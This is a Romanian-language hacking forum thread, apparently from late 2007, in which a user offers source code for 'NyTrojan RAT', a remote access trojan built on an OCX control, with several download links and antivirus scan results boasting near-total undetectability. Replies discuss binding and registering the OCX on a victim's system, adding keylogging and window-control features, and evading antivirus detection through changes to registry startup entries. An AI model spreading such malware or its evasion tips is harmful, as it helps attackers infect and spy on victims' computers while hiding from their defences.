Jump to content
Nytro

NyTrojan RAT Source Code 97% UD

Recommended Posts

Un trojan , care foloseste toate functiile NyTrojan.OCX

Deci folositi ocx : obtineti un trojan 97% UD , decat McAfee il gaseste , foarte usor de folosit functiile OCXului , faceti foarte usor Keylogger si multe altele .

Sursa ESTE EXPLICATA , cred ca veti intelege toti :)

Grafica e varza dar e nedetectabil : decat McAfee l-a gasit ca VB-BackDoor.a.gen .

Download Source Code ( e si OCX acolo ) :

http://rapidshare.com/files/80026164/NyTrojan_RAT_Source_Code.rar

http://www.speedyshare.com/611620807.html

http://www2.eushare.com/download.php?file=NyTrojan%20RAT%20Source%20Code.rar

http://www.netdrive.ws/40906.html

Screenshot :

nytrojansccq7.jpg

Server Scan :

File Server.exe received on 12.30.2007 10:13:07 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 1/32 (3.13%)

Client Scan :

File Client.exe received on 12.30.2007 10:17:04 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 1/32 (3.13%)

OCX Scan :

File NyTrOjan.ocx received on 12.30.2007 10:20:40 (CET)

Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED

Result: 0/32 (0%)

Mai multe depre OCX :

http://rstcenter.com/forum/nytrojan-ocx-t9594.rst

Link to comment
Share on other sites

OCX Scan

Preety smart ... ai scanat un OCX :)) ?

daca victima nu are ocx-u tau trojanul functioneaza?sau nu,,,?

Tu ce crezi ? Normal ca nu.

Cat despre asta, e cam timp pierdut. O sa imi sustin afirmatia maine - acum mi-e cam somn -, prin prezentarea unui DLL interesant ;).

Link to comment
Share on other sites

tw8, ocx-ul se poate binda si inregistra in sistem foarte usor.

Stiu :P.

Atata timp cat functioneaza nu vad de ce ar fi timp pierdut degeaba.

AutoIT a scos o chestie destul de interesanta numita AutoITX. Are o gramada de functii interesante, concepute pentru automatizari si care pot fi folosite cu usurinta pentru a realiza in orice limbaj de programare lucruri cel putin dragute.

Numeroasele optiuni de lucru cu ferestrele il fac ideal pentru optiuni de fun pentru trojani.

In plus, are si un help solid si e foarte usor de implementat in limbajele .NET .

Cam atat cu vorba ca adorm pe tastatura.

Link de download pentru curiosi:

http://www.autoitscript.com/cgi-bin/countdown.pl?AutoIt/AutoItX.zip

Link to comment
Share on other sites

Incerc sa copiez ocx in Form_initialize din fisier de resurse sa vad daca merge ... Si sunt sigur ca nu am muncit degeaba , 97 % nedetectabil ... de fapt nu vad de ce ar fi detectabil ... in cod nu gasesti decat NyTrojan1.OpenCDRom , NyTrojan1. ... etc ... deci trojanu propriu zis nu va fi detectabil , nu are cum , insa ocx , cred ca va fi detectabil ... si mai am o idee , pentru a face un trojan nedetectabil , dar o pastrez , pentru cand devine ocx detectabil...:)

Link to comment
Share on other sites

Tu auzi ce prostii debitezi ?

OCX detectabil ... yeah 8).

De fapt, un OCX poate fi detectat de AV. Pentru ca foloseste formatul PE (la fel ca si executabilele, DLLurile si alte fisiere cu alte extensii [.scr, .sys]). Spre exemplu, un fisier cu extensia .dat nu o sa fie niciodata detectat de AV, pentru ca nu foloseste file formatul de mai sus.

Link to comment
Share on other sites

Nu numei PE ... si txt sunt gasite ... De ex. c99-le il aveam txt ... si a fost gasit ca virus ... daca intram pe coolpics ... site ala cu virusul de dadeai massuri pe mess , nu ma lasa kasperky sa intru ... Ar trebui ca antivirusii sa gaseasca si .vbs , .bat ... fiiere care pot face rau ... insa ocx meu , singur nu poate face nici un rau , decat daca un exe , ii foloseste functiile ...

Link to comment
Share on other sites

Da Nytro, dar antivirusii scaneaza comparand cu baza lor de date si cand gasesc ceva similar, sar imediat avertizand ca fisierul este suspicios. Ocx-ul este "descopmpus" la analiza si .. atata timp cat exista vechile coduri, tot va sari, chiar daca includem ceva nou intre timp ;) Eu 1 am facut niste teste si ... partile la care trebuie lucrat sunt intrarile in registrii (startup), in primul rand.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...